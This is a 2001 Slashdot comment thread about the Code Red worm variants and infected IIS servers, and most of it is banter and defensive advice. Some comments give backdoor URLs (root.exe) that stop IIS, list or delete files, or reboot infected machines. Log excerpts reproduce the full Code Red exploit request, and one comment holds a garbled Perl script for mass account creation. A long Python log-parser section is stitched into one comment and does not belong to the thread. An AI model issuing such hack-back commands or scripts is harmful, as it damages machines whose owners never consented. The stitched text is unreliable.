  438. K5 contest by Anonymous Coward · · Score: 2, Informative
    That contest is already running on Kuro5hin. The big "problem" is that many systems don't run IIS with Administrator priv, so the backdoor is limited in how much repair it can do.

    I just have my web server do a "net send %DOMAIN%" to warn them about their problem.

  439. Re:Well...at least RR is trying to help... by Anonymous Coward · · Score: 0

    how about a link?

  440. Re:Sig (Offtopic(Offtopic)) by Cardhore · · Score: 1

    heheh funny story.

    someone should make a "sig archive" on the web, with people's signatures and whose they are.

  441. Responsibility lies with the Network by medcalf · · Score: 0, Troll

    Admittedly, MS shipped a flawed product (IIS), and shipped it to users who have no idea that the product is even running on their box. Bad MS! Bad!

    Admittedly, most computer owners are idiots (assuming that computer users are evenly distributed throughout the population, which mostly consists of idiots) and don't patch their machines regularly, or at all. Bad user! Bad!

    However, it is counter-productive to bash MS for this, because they have released a patch some time ago and what else can they do? It is counterproductive to bash the users, because most of them don't know how to install a patch, or even what a patch is, and have no source of information to help them out (and even if MS mailed out information, how many of these users could and would understand and follow it? - they need someone who knows what they are doing to help them, and they don't know that they need that help).

    The only place that this worm can be stopped is at the network level. ISPs need to block not inbound port 80, but outbound port 80 from machines on their network known to be infected. Better yet, redirect all outbound port 80 from known-infected sites to a web page at the ISP which explains the problem and how to fix it, and what number to call for more help and to get your web access turned back on. DO NOT use this to get a fix on who's running servers on your network that you need to punish, or people will stop calling you for help! This cuts the spread of the worm immediately, because an infected machine can no longer spread past the first router it comes to. It also gradually cleans up the problem at the source, and eventually most of the infected machines wouldn't be. Those machines not fixed would at least not be able to spread the infection, because the pathway would be closed. If this were done at each level of the network, the worst case would be a machine that could get out to the backbones because of sloppy admins at the ISP, but then would be caught and blocked by the backbones.

    The whole idea is to fix the problem, rather than bitching about who should not have let it happen in the first place.

    -jeff

    --
    -- Two men say they're Jesus. One of them must be wrong. - Dire Straits
    1. Re:Responsibility lies with the Network by JohnnyBolla · · Score: 1

      Do you have even the slightest idea what kind of hardware upgrade this would require on most ISPs?

      --
      Carpe Deez
  442. my last hit... by icantremember · · Score: 1

    24.187.23.157 - - [09/Aug/2001:15:22:19 -0400]

    that's my last code red v.anything hit...
    i am on a 24.x.x.x address space from my cable modem provider, and the lately unstoppable modem blinking has slowed down quite a bit...

    mike

    --

    ==
    apostrophes...right...
  443. Re:Well...at least RR is trying to help... by Megahurts · · Score: 1

    > (not that you're supposed to be running a server anyway...)

    hmm... I never saw anything along those lines in my TOS. I didn't sign it anyway. The installation oafs were dumb enough to let it slide.

  444. Re:Well...at least RR is trying to help... by Mynn · · Score: 1
    I thought it was a bit ironic that RR was advising everyone to be aware of the possibility for infection .. nevermind the fact that you're not supposed to be running a server.


    But if you are running OFFICE2000 with FRONTPAGE2000 you are vulnerable, too.
    --

    Face it, people are stupid, and the internet is the place where they all meet.
  445. sick of the log entries by Defiant+One · · Score: 1

    Don't know about you, but I'm sick of looking at this crud in my logs. Unfortunately, trying to redirect, rewrite or otherwise filter the request, along with the "vti" hack from FrontPage, just produces either the same log entry with a 302 in place of a 404, or a double entry with the request and the redirect.

    Makes me want a stripped down filter box to grab those requests and not log them. How many terabytes of wasted disk space are going to be devoted to M$ hacks in rotating logs??

    --
    You will outgrow your usefulness - actual Slashdot footer quote
  446. Hey!! I have a question! by ioman1 · · Score: 1

    Where are the Code red viruses originating from?

    1. Re:Hey!! I have a question! by c13v3rm0nk3y · · Score: 1

      It is the question that burns your mind, like an itch you can't scratch. You want to know What. It. Is.

      The Code Red is all around us. It is the air you breathe, the food you eat. Code Red is there when you go to work and when you pay your taxes.

      --
      -- clvrmnky
  447. Code Red III sighting by Anonymous Coward · · Score: 0
    No, I tend to believe there is a new worm. I got hit 12 times within a minute by a server in South Korea -- from the same city as mentioned in the Reuters story. That's not how the earlier worms behave.

    It was a university server, so I assume my automatic net send to their domain got some attention.

  448. Names ? by Anonymous Coward · · Score: 0

    Can't someone give these sequels better names? Sequel naming is a serious issue. Look what's happened to Star Wars.
    How about :
    Code Red II : Return of the Virus
    Code Red III : The Press gets excited
    Code Red IV : The Press gets bored
    Code Red V : Y2K redux

  449. How can you get a BIGGER back door than CRII? by Enigma2175 · · Score: 2
    from the article:
    leaves a wider "back door" on infected machines, making them more vulnerable to future hacking.

    I have no idea how you can make a wider back door than CRII. With CRII, the back door has full administrative rights and you can execute arbitrary commands. The machine is FULLY compromised. Plus, due to the nature of the worm each compromised machine broadcasts its IP address to nearby machines. The only way to get a wider back door than CRII would be to put the back door on EVERY PORT.

    --

    Enigma

  450. Well...at least RR is trying to help... by Opusnbill7 · · Score: 1

    According to one of their help pages, they're going to start kicking people off of their network who are infected on Tuesday. Now whether that was last tuesday or this coming tuesday wasn't clear, but at least that will help cut some of the traffic down. Avoids the whole blocking/filtering port 80 issue also (not that you're supposed to be running a server anyway...). Now...how are they supposed to get the patches, tho...?

  451. Linux to the rescue? by small_dick · · Score: 0, Redundant

    I have heard the affected machines have a r00t kit installed.

    If so, I wonder if some white hats could write a script that:

    1)detects an attack;
    2)goes into the Windows machine;
    3)installs the MS patch;
    4)reboots the Windows machine.

    That, although technically illegal, would help clean up the problem, no?

    --


    Treatment, not tyranny. End the drug war and free our American POWs.
    See my user info for links.
    1. Re:Linux to the rescue? by Anonymous Coward · · Score: 0

      If so, I wonder if some white hats could write a script that:
      1)detects an attack;
      2)goes into the Windows machine;
      3)installs the MS patch;
      4)reboots the Windows machine.

      Let's rephrase this...
      1)detects an attack;
      2)goes into the Windows machine;
      3)formats C:
      4)reboots and installs Linux.

      and for all you idiots saying that apache is so bad, how come there are 26 Fucking pages of HOW-TO secure iis? How about 1 file? How about 1 page? if apache has a problem, boom we download a new version -- problem solved.

  452. Buffer overflow vulnerabilities by loki4eng · · Score: 1

    Is what happens when you code your OS in C++. Sorry all you C++ dudes, but you know it's true.

    --
    It's nota my planet, monkey-boy - Dr Lizardo.
  453. come on III, kick II's ass by dermotfitz · · Score: 0, Flamebait

    I think this is really fun. Of course I am not an ISP or anything. Anyway, I am looking forward to a nice DDOS of whitehouse.gov this time around. That'd be fun wouldn't it? This is some nice distributed computing :) Has there ever been a virus so widespread as Code Red X ? Is this going to be the future of virus writing? Imagine something similar being written for routers? By the way, is it possible to write a virus that can't be decoded by the spoilers over at Eeye and all you old programmers out there? Would it be possible for someone to put one together that no one knows what it was going to do until it did it?

    --

    How perfectly goddamn delightful it all is, to be sure. - Charles Crumb
  454. Wednesday's article. by hivolt · · Score: 1
  455. Its called personal web server by gad_zuki! · · Score: 2

    IIS doesn't even run on 9x, ME, or other spawn of 3.x

    Actually you can run a mini version of IIS that could be susceptible to code red on a 95 or 98 machine. The personal webserver from MS is advertised as only working on NT but it'll run on 95 or 98. I haven't tested it on 95 though.

    I've gotten default.ida hits from PSW so I know it's susceptible to at least one kind of code red.

  456. And next... by Balinares · · Score: 1

    Check out the amazing prequels!! CodeRed 0, CodeRed -1, and then BetaCode, in all theat-- err, all MS servers, starting next week! Don't miss the excitement!!

    --

    -- B.
    This sig does in fact not have the property it claims not to have.
  457. Coming Soon! by AndroidCat · · Score: 1

    A major haxor group is rumoured to be close to releasing a new product: Code RedHat

    The group spokesit 3v1l d00mm said "Yeah well, why should clueless Windoh!s lusers have all the fun? There's a lot of clueless Linux lusers these days who just install RedHat out of box, and don't add the patches. You can root these machines in less than a minute, but where's the fun in that? Besides, with Linux and a good connection, even 386 boxenthings with 8 meg ram are deadly! We expect that Code RedHat will show the world how much better Linux is than Microsludge. If you thought hundreds of thousands of copies of Code Red I/II slowed the net, watch what even a couple thousand copies of Code RedHat can do!"

    When I asked if they planned to distribute through store channels, the Internet, or corporate clients, he grinned and said "Distribution will not be a problem."

    When asked if they plan to make it Open Source, 3v1l d00mm said "Hey, we'd like to but we're still talking to our lawyers, and what with the IPO coming up, project deadline and all that, we'll have to see."

    --
    One line blog. I hear that they're called Twitters now.
  458. Time for class action against Microsoft... by Julz · · Score: 1

    Doesn't this seem like a good time for all the owners of websites that pay for bandwidth usage on their sites to join forces and take out a class action suit against Microsoft for allowing such an easily exploited backdoor into their "Enterprise" class web server or dumpster, and having their servers then spam the internet looking for other servers with their insidious backdoors?
    Time Microsoft paid for the crap that they foist onto Corporates and Individuals alike.
    Might finally get some real financial support for the open source movement via payouts from this sort of thing to people using alternative web servers, etc.
    Does anyone know if this kind of backdoor might exist in Microsoft's "Enterprise" Mail Server Exchange. Must be somewhere with all the new "features" they've added.

    --
    When shit hits the fan get some of these https://youtu.be/pY-GncsZ-UE
  459. The solution by tbone1 · · Score: 1
    I'm still wondering what I should do with the hundreds of IPs in my desktop's apache log trying hopelessly to overflow my buffer.

    Obvious! Put a story about them on slashdot, with a link to their server. They'll be shut down in no time!

    --

    The Independent: Reverend Spooner Arrested in Friar Tuck Incident - ISIHAC, Historical Headlines
  460. stopping code red by Anonymous Coward · · Score: 0

    the account that you access web pages through on an iis server doesn't have the rights to do anything very drastic, such as stopping the service or downloading and installing the patch. so this being said, there is only one thing that will stop the worm, a world wide power outage that outlasts all the battery back ups and generators, or short of that, diligent work by everyone who's getting attacked to make sure that some educated person knows about every infected box. this being said it's prob. safe to assume that new victims roll out of computer manufacturers on a daily basis with iis enabled by default on 2k pro and server machines. which means that even if code red II drops away, there will always be an available audience for code red III,IV, or V.

    that's what i think. if you don't like it, attack my ideas not me

  461. The Underlying Problem ... by dbCooper0 · · Score: 0
    Ya Well,

    I thought @home was not so wrong for blocking incoming packets to port 80, but guess what?

    I had an attack about 30 seconds after I turned IIS back on (upon reading some of the above and getting curious).

    Also, for at least a week and ½, I've been getting hit with ARP-RARP packets at the rate of 10 or more per second from what I believe to be a router in Muskegon, with targets of all the still-infected machines.

    It's obvious that AT&T has not kept up its own side of the TOS - and curious that when I signed up for cable modem last year, they wouldn't support Win2k (cough, cough - I have to run it - I'm a MCSE with too many clients running it to get rusty), and the reason for No Servers was to avoid some idiot issuing DHCP to the other customers.

    BTW, I'm used to getting diddle from large corporations in the way of customer service - I just hope I can get them to fix my lawn before the snow flies. Some brain-dead cable rat drove his boom truck over my lawn to check a pole, and the lawn is about a foot above water level. I complained a month and a half ago and still no response!

    (If anyone on /. would care to identify the "strain" of the worm that just tried me, I'd be happy to squirt the log text in the thread - with my IP removed to protect the innocent...)

    --
    db
    Cig:
    ôô
    /`
  462. No prob, the download is here by WillSeattle · · Score: 1

    God, I'm still on version 1 of code red. Does anybody know where I can download the latest version? Is there a mail list I can get on so I know I have the latest version on my IIS server?

    Try Microsoft or Hotmail. I think they have the latest version of it running on most of their systems now.

    --
    --- Will in Seattle - What are you doing to fight the War?
  463. default.ida web logs by Anonymous Coward · · Score: 0

    Taco wanted to know what to do with his web logs, what we've been doing is punching the following URL into our browsers whenever we see one of those stupid requests... http://_IP_OF_SERVER_/scripts/root.exe?/c+net%20st op%20w3svc That will shut down IIS on the machine... Should get their attention and hopefully motivate them to fix their shit...

  464. a harsher solutions, perhaps? by WickedLittleSlaveBoy · · Score: 0

    it's obvious the patches aren't working....so, can we round up all the useless MCSEs and string them up this time?

  465. Can I have a complete IP list... by linuxrochester · · Score: 0
    I would love to have a complete IP list of all infected servers. This way, I can send my resume to all of the infected companies for a SysAdmin job! Apparently the current admins aren't worth a sh*t!! How hard is it to install a patch. Maybe these morons just enjoy watching the worm propagate! Give me a good salary, and I WILL install the patch!!

    New Code Red Worm patches here

  466. ok you bigots :) by Gnea · · Score: 1

    since people are whining about not seeing CR3 show up yet, i just had it hit about 30 minutes ago, here's the log:

    !IP goes here! - - [10/Aug/2001:13:44:15 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 1141 "-" "-"

  467. Not Code Red 3 by lqx · · Score: 1
    Just FYI, Even CNet says it's not Code Red 3. And you know you can trust them .. emm ... ok .. maybe trust them..

    here is the story.

  468. How many more??? by 9sPhere · · Score: 0

    Are we going to be on Code Red version 99.1 before some of these dumb ass sysadmins take a little time and just patch their POS IIS servers? How many times do you need to be kicked in the crotch before you learn to get out of the way???

    --
    It is pitch dark. You are likely to be eaten by a grue.
  469. Re:Gives me an idea to stop it spreading so fast.. by srw · · Score: 2, Informative

    It's been done. It's been on slashdot.

    http://slashdot.org/article.pl?sid=01/08/04/1413211&mode=thread


    Look for "codeRedNeck"

  470. Re:Code Red infection in spite patch - moderation by shibut · · Score: 0

    I've posted a few times so far and it's always at score=0, I'm wondering why since Shibut != AC ... DO I have to add some $%^&**(^%#@ to get moderated to a measly 1-2?

  471. GIMPS - pull a Blosser by sphix42 · · Score: 1

    I'm still wondering what I should do with the hundreds of IPs in my desktop's apache log trying hopelessly to overflow my buffer.

    AB explains how to install GIMPS here. I'm not a proficient enough nt scripter to do this to compromised machines, but I have a nice big list of IPs I'd love to install GIMPS on!

  472. So does the GPL by roju · · Score: 2, Insightful

    Have you ever read the GPL?

    It specifically disclaims any and all liabilities and warranties.

    If the Microsoft EULA disclaiming responsibility is invalid, isn't the GPL's? If you argue that GPLed software is free, so consumer protection laws don't apply, then what if you paid Red Hat $15 for their distribution?

    Regardless of whether you paid them for the packaging or the 1-800 support number, you bought something from 'em, so shouldn't they be liable if your linux box ruins your MySQL database?

  473. Road Runner is getting blitzed by CR II by Anonymous Coward · · Score: 0

    My apache server is sitting here in San Diego getting about one hit every 5 minutes from CR II.

    Code Red one looked like this:
    [root@dt000n00 /root]# cd /var/log/httpd/
    [root@dt000n00 httpd]# more access_log

    195.117.17.130 - - [19/Jul/2001:19:24:15 -0700] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 333

    Code Red IIs look like this:

    [root@dt000n00 httpd]# grep "XXXXXXXX" access_log |more
    204.210.27.38 - - [04/Aug/2001:09:21:23 -0700] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 281

    [root@dt000n00 httpd]# grep "NNNNNNNNN" access_log |wc -l
    121
    [root@dt000n00 httpd]# grep "XXXXXXXXX" access_log |wc -l
    1616

    That's it. 10 days, and less than 2000 hits. BIG WHOOP. Yawn. Some idiot's IIS server is down? Who cares? This is *not* the end of the internet.

  474. very strange by mackermacker · · Score: 0

    The first time I went to the site, I was bombarded by a huge flash advertisement for absolute vodka, the second time nothing..

    Why won't someone release a worm that affects web advertisements in the middle of an article?

  475. Put it in another log and forget about it. by Malc · · Score: 4, Interesting
    "I'm still wondering what I should do with the hundreds of IPs in my desktop's apache log trying hopelessly to overflow my buffer. "

    I'm not even sure how to spell regexe, but this is what I've attempted to do:

    # Tag every request whose URI contains default.ida (the Code Red probe)
    SetEnvIf Request_URI /(.*default.ida.*$) code-red-request
    # Write the tagged requests to their own log file...
    CustomLog /var/log/apache/code-red-request.log common env=code-red-request
    #CustomLog /var/log/apache/access.log common
    # ...and keep them out of the normal access log
    CustomLog /var/log/apache/access.log common env=!code-red-request

    # Bounce the probe back to the requester's own loopback address
    RedirectMatch Permanent /(.*default.ida.*$) http://127.0.0.1/$1
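    The counting and log-splitting that Delphis (#432), the Road Runner poster (#473) and Malc (#475) do with grep and SetEnvIf, collected in one place as an added example that is not code from any poster in this thread: a small parser for Apache common-format lines that recognises the two default.ida probe shapes quoted above (a run of N for the July worm, a run of X for Code Red II), counts hits per variant and per source address, and separates worm lines from ordinary traffic the way Malc's two CustomLog rules do. The sample log lines, the 192.0.2.x and 198.51.100.x addresses, and the 100-character padding threshold are constructed assumptions, not data from the thread.

```python
import re
from collections import Counter

# Apache "common" log format: host ident user [time] "method path proto" status bytes.
# Combined-format lines (referer and user-agent appended) match too; there is no $ anchor.
CLF_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: (?P<proto>[^"]+))?" '
    r'(?P<status>\d{3}) (?P<bytes>\S+)'
)

# Both worms request /default.ida with a long run of one padding letter:
# 'N' for the July 2001 worm (Code Red v1), 'X' for Code Red II.
# The 100-character minimum is an assumption chosen so ordinary short URLs never match.
IDA_RE = re.compile(r'^/default\.ida\?(?P<pad>[NX])(?P=pad){100,}')

# Trailing %u-encoded part of the probe exactly as it appears in the log lines quoted in the thread.
CR_SUFFIX = ('%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3'
             '%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a')

# Constructed sample log (documentation-range addresses, not real hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [19/Jul/2001:19:24:15 -0700] "GET /default.ida?' + 'N' * 224 + CR_SUFFIX + ' HTTP/1.0" 400 333',
    '192.0.2.20 - - [04/Aug/2001:09:21:23 -0700] "GET /default.ida?' + 'X' * 224 + CR_SUFFIX + ' HTTP/1.0" 404 281',
    '192.0.2.20 - - [04/Aug/2001:09:21:40 -0700] "GET /default.ida?' + 'X' * 224 + CR_SUFFIX + ' HTTP/1.0" 404 281',
    '198.51.100.5 - - [10/Aug/2001:13:44:15 -0400] "GET /index.html HTTP/1.0" 200 1141 "-" "-"',
    'not a log line at all',
]


def classify_request(path):
    """Return 'CodeRed-v1', 'CodeRed-II', or None for a request path."""
    m = IDA_RE.match(path)
    if m is None:
        return None
    return 'CodeRed-v1' if m.group('pad') == 'N' else 'CodeRed-II'


def parse_line(line):
    """Parse one common-format line into a dict (plus a 'variant' key), or None if malformed."""
    m = CLF_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec['variant'] = classify_request(rec['path'])
    return rec


def summarize(lines):
    """Count worm probes per variant and per source host; malformed lines are counted, not raised."""
    by_variant = Counter()
    by_host = Counter()
    unparsable = 0
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            unparsable += 1
            continue
        if rec['variant'] is None:
            continue  # ordinary traffic
        by_variant[rec['variant']] += 1
        by_host[rec['host']] += 1
    return {'by_variant': dict(by_variant), 'by_host': dict(by_host), 'unparsable': unparsable}


def split_log(lines):
    """Separate worm probes from everything else, like the two CustomLog env= rules do."""
    worm, other = [], []
    for line in lines:
        rec = parse_line(line)
        (worm if rec is not None and rec['variant'] else other).append(line)
    return worm, other


if __name__ == '__main__':
    summary = summarize(SAMPLE_LOG)
    for variant, n in sorted(summary['by_variant'].items()):
        print(f'{variant}: {n} hits')
    for host, n in sorted(summary['by_host'].items(), key=lambda kv: -kv[1]):
        print(f'{host}: {n} probes')
    print(f'{summary["unparsable"]} unparsable line(s)')
```

    Run it over a real file with `summarize(open('/var/log/httpd/access_log'))`; unlike `grep XXXXXXXX | wc -l`, it will not count a line twice when the same host appears in both a combined and a common log, and the per-host counts give the list of addresses Delphis and the others were after without having to eyeball the log.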
  476. Will this even work? by TheMidget · · Score: 1

    I think you need to reboot the machine first, in order to remove file protections, which would otherwise prevent the disk from being formatted. And for some stoopid reason, GET /script/root.exe?+%2fc+iisreset+reboot doesn't seem to work...

  477. Microsoft's New Logo by clone22 · · Score: 1
    .. should be a pair of old jeans with patches all over them.

    --
    Ask me about my vow of silence!
  478. I heard something - by mergy · · Score: 1

    Microsoft is releasing Code Red IV a month earlier so the various virus companies don't quash their ability to innovate.

  479. And more will come... by Bagheera · · Score: 1

    This sounds a lot like the derivatives of the ILoveYou Outlook Virus. Someone does the initial exploit, and other people modify the code to be more destructive, carry a different payload, whatever. Chances are we'll see more variations on this theme in the near future.

    The sad part is that it appears that the vast majority of infected systems are owned by folks who don't even know they have IIS installed on their machine. It was either part of a default load, or they clicked "YES" at some point in an installation without really understanding what they were saying YES to.

    Personally, I think we need to have a lot more coverage of this than we're getting. A lot more instances of "If you are running a Windows system, please install all the latest patches today!" on the news, web, etc. Though to be fair, there are a lot of *IX systems unpatched out there too...

    I know.

    Wishful thinking...

    --
    Never attribute to malice what can as easily be the result of incompetence...
  480. Interesting Irony by Naerbnic · · Score: 5, Funny

    So, Three Code Reds and a SirCam later, the question just begs to be asked:

    Who's calling Whose code "Potentially Viral"?

    --
    So there I was, juggling apples and small animals, when I accidentally bit into the wrong one...
  481. Reply to them with this friendly little "howdy" by Anonymous Coward · · Score: 0
    http://IpOfHackedMachine/scripts/root.exe?/c+DIR+c :\

    Or maybe

    http://IpOfHackedMachine/scripts/root.exe?/c+DEL+c :\*.*

  482. Roman numerals not a good idea by Mark+of+THE+CITY · · Score: 1

    I can see it now, a bearded discourse on the differences between CodeRed MCMLXXXIII and MCMLXXXIV...

    --
    The clearance system sounds logical. It is not. It is completely arbitrary. -- John Bolton
  483. Service Name for IIS is.... by Anonymous Coward · · Score: 0

    inetinfo.exe

    But you didn't hear that from me......

  484. Re:Sig (Offtopic(Offtopic)) by sh00z · · Score: 0, Offtopic
    someone should make a "sig archive" on the web
    Here's the one I'm in. There may be others, but who cares?
  485. Worthy by fobbman · · Score: 2

    Now this is a sequel worthy of the name The Clone Wars.

  486. Code Red 95 by ArtWDrahn · · Score: 1

    I can't wait until Code Red 76. I heard this version will wash your car, take your pet for a walk, reformat any version of Linux and install Windows over it, all in its first 30 nanoseconds of birth. Personally I look forward to it. God knows it was created by the Borg known as Microsoft. ^_^

    --
    The Tweak Files: Sanity is for t
  487. Redhat's unnecessary daemons by Macrobat · · Score: 0
    Though to be fair, some Linux distributions - cough, RedHat, cough - turn on all sorts of random services by default that the user probably doesn't want/need.
    They fixed that as of RH 7.1.
    --
    "Hardly used" will not fetch you a better price for your brain.
  488. report them to securityfocus.com! by Anonymous Coward · · Score: 0

    SecurityFocus (a.k.a. Bugtraq) is collecting infected IP addresses with timestamps. Send them to aris-report@securityfocus.com. I have been keeping track of the hits to my system at debussy.ucsc.edu.

  489. I think you're on to something... by Nate+Fox · · Score: 5, Informative

    According to Symantec's page on CR2:

    Also Known As: CodeRed.v3, CodeRed.C, CodeRed III, W32.Bady.C

  490. new name by sp0rch · · Score: 0

    We should rename it, this is boring, like maybe code-reder, or code-evenreder, or code-redmund.

  491. Redundant Response by Anonymous Coward · · Score: 0

    It's illegal to do anything to another person's computer without their permission, even if your intentions are benign. You get caught, you go to jail.

    I won't complain if someone else does it, though.

  492. Re:M*derators! by Anonymous Coward · · Score: 0

    Blah. STFU with the whinging before j00 are modded down forever. If you don't like the way Slashdot works, run this script ;)... #!/usr/bin/perl use IO::Socket; srand(time^$$); # Set $c to uid count: $c = 20_000_000; # create 20,000,000 new accounts. sub junk { #create $_ many random letters. $s=""; for($j=0;$j'tcp', PeerAddr=>"slashdot.org", PeerPort=>80); $sock->autoflush(1); print $sock "GET /users.pl?op=newuser&newuser=$n&email=$e HTTP/1.0\r\n"; print $sock "User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)\r\n"; print $sock "Referer: http://slashdot.org/users.pl\r\n \r\n"; close($sock); print "Created $n ($e)\n"; }